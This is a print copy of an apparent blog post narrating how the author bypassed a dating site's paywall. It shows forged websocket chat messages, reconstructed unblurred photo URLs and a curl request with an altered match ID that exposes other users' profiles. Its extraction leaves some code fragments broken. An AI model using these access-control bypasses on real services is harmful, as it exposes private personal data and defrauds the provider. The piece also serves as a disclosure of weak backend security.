Académique Documents
Professionnel Documents
Culture Documents
1 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Disclaimer:
I am not a fan of online dating, nor do I have any online dating apps
installed on my devices. I have tried few of the most famous online
dating apps and they did not appeal to me. I love approaching
people anywhere and saying Hi.
This dating website charges more than £50 per month to be able to
see photos and to message people. That surely is because they are
providing such smart service.
2 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
The dating website does not even allow you to read the message. So I
thought: Hmm, let’s see how smart these “smart” people are.
3 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Well I can see the profile and every detail she has entered about
herself. Kinda creepy, but okay, anyway this kind of shows on the
application. But wait, did they just send the girl’s full profile
over non-secure HTTP? Hmm…
4 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
I said, well if the iOS application is a bit hard to hack, let’s try the web
application. I head over to their website and logged on. I could almost
see the same interface, same blurred faces, same inbox which I
cannot read.
5 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
[
{
"messageId": "b123738-5123-4123-9123-1232333b1234",
"type": "CHAT",
"value": "Hi Zed! I feel like I should send an
interesting message but I'm all Mondayed out. How are you?",
"createdTimeStamp": 1523914585468,
"readTimeStamp": 1523914778123,
"sender": false
},
{
"messageId": "ABC1235C-AABC-4ABC-8ABC-1ABC4EBC7ABC",
"type": "SMILE",
"createdTimeStamp": 1523883156123,
"readTimeStamp": 1523886591123,
"sender": true
}
]
6 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Okay, well cool, but still I cannot pinpoint who this person is, nor
reply back. Since we got this far, probably we can go even farther.
If I need to send a message, then the first thing I’d have to do is to see
how does sending a message look like. So I switched to any other
person there is on my match list, clicked on the button to send a
pre-defined message, selected one of them “If you are famous, who
would you be?”, and sent it out.
Okay, looking over the PUT and POST requests that we just created, I
cannot find the word “famous” anywhere. Is it that the word does not
get sent, or is there something else going on?
In one of the POST requests that happened after I sent the message,
the payload was:
{
"logs": [
{
"logMessage": "Message Sent (Soft ACK) - on server
sender",
"method": "WEBSOCKET",
"logLevel": "INFO",
"additionalInfo": "{\"messageId\":\"12351f23-
fABC-4ABC-9ABC-ABCc123a0ABC\",\"matchId\":12309078132}"
}
]
}
7 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Damn, “famous” also does not exist in the websocket. Looping over
the messages trying to understand the XML being sent (who the hell
uses XML these days for websocket communication?), it looks like
that it is:
• Opening a connection
<message xmlns=”jabber:client”
to=”123jnwrvd7_123gd2abcv12_12@chat.xyz.com” id=”84123ff6-
8 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
f123-4123-9123-c123458a0abc" type=”chat”><body>{“message”:
{“messageId”:”84123ff6-f123-4123-9123-
c123458a0abc",”type”:”CEQ”,”value”:”62"}}</body><request
xmlns=”urn:xmpp:receipts”/><data><accesstoken>84123ff6-
f123-4123-9123-c123458a0abc</accesstoken><header name=”User-Agent”
Safari/537.36"/><header name=”X-xyz-gdid”/>
<resourceid>12309078132</resourceid></data></message>
Awesome, now since I understand how the sending works, let’s try to
replicate this.
• Authenticate. Good.
9 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Hah, that’s easy. Okay, how do we send a message now to this match.
{“message”:"Hey There!"}
Aaah, error.
xmlns=’urn:ietf:params:xml:ns:xmpp-stanzas’/><text
method
at [Source:
org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$Un
reference chain:
com.xyz.services.comm.api.message.ClientMessageWrapper["messa
ge"])</text></error></message>
I opened the list to send more messages and I inspected the HTML
and it turns out that that message has the ID 62.
Ah okay I see where I went wrong, messageId is some other ID, while
the value is 62 for the pre-defined message. What about type “CEQ”,
what should I set that to?
10 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
I see what to do now, just set the type to CHAT, and the value to my
chat message. Let’s try it out.
Response:
y27r7c8tjky@chat.xyz.com/android.phone.emulator’
to=’1231232yr2_3–6sgyt-
c612337t@chat.xyz.com/android.phone.emulator’ xml:lang=’en’
id=’123f7–32' type=’chat’><data/><received
xmlns=’urn:xmpp:receipts’ id=’81231236-f5ce-abcd-
9abc-c6e12312312c0'/></message>
to=”123jnwrvd7_123gd2abcv12_12@chat.xyz.com”
Copy the extended profile information to Sublime Text. Find the chat
address in text. Ah, it is the encrypted user ID. Okay, let’s try that.
{“message”:{“messageId”:”84123ff6-f123-4123-123b-
Well that was a fail, I sent it to the same girl that I tested on. Hah.
11 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Shouldn’t have added the name, it’ll look super weird now…
Weeeeellll. Let’s try again.
After a long look at all these IDs and chat addresses, it turns out it is
the resource ID:
<resourceid>12309078132</resourceid>
Trial number 2:
Find what that resource ID is. Okay that’s the user ID that’s not
encrypted. Easy peasy. Edit the resource ID, and voila. We have a
message sent to the cutie!
I started thinking, well this is getting fun. How about we try to see
those blurred photos now. In the profile JSON array, there is a list of
photos, and the URLs look as such:
https://images.xyz.com/photos/v2/photo/NORMAL
/I1/d5abcttnp5yxjytb227v6fp56p.jpg?blur=60&crop=faces&
fit=crop&g=2&h=160&ixlib=java-1.1.1&w=160&
s=cda2e652b4182b123a1f5f6781daa36a
I was thinking, maybe if I have a paid account, then I can see how can
12 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
I map the blurred images to the original images. Well I’m not really
gonna do that.
Well just check my own profile picture, what does the URL consist
of?
In fact I did:
https://www.xyz.com/photos/v1/photo/THUMB
/I3/1236VKj18jtm5Ih8Cr2pSAabc.jpg
https://www.xyz.com/photos/v<version>/photo/<SIZE>/<IMAGE-
NUMBER>/<ENCRYPTED-USER-ID>.jpg
That’s easy, let’s apply that to another match’s image. And voila,
we’ve got the image there.
13 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Okay let’s check how insecure this is. Can we read other people’s
profiles without even being matched to them? Let’s see.
https://www.xyz.com/publicapi/v2/matchprofile/<match-
id>/profile
curl 'https://www.xyz.com/publicapi/v2/matchprofile
/12303942525/profile?' -H 'authorization: Bearer
12339f23-2302-4e6f-b9ae-1f9c99a6e123' -H 'Accept-Encoding:
gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,ar;
q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS
14 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Alright, let’s change one number of the match ID, and see if we can
get data.
That’s good. Can we get those profiles though using a user ID? I
cannot see how we can do that now. No problem. I won’t waste more
time on this, my point’s proven.
Moral of the Story
I am not a hacker, nor do I want to cause damage. I just understand
how web services work. The reverse engineering I just did is 99%
done on Chrome without the need of any other tools. Gaining full
membership features to a service that charges so highly was so easy
as most of the security was done at the frontend, not the backend. It
is a high-walled castle with an open gate and no guards inside it.
15 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
16 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
websocket.
17 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
Remember that with GDPR, you can request a copy of your data in
human readable format from any service provider, and that this
request must be fulfilled in 72 hours.
Once news about companies being fined start to come out, companies
will start employing practices to secure their systems. After all, it
seems that only 27% of business thought that GDPR applies to their
business, and half of UK’s businesses know about GDPR.
18 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
19 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
20 di 21 20/08/2018 17:38
How I Hacked Into One of the Most Popular Dating Websites https://medium.com/hackerpreneur-magazine/how-i-hacked-into-one-o...
21 di 21 20/08/2018 17:38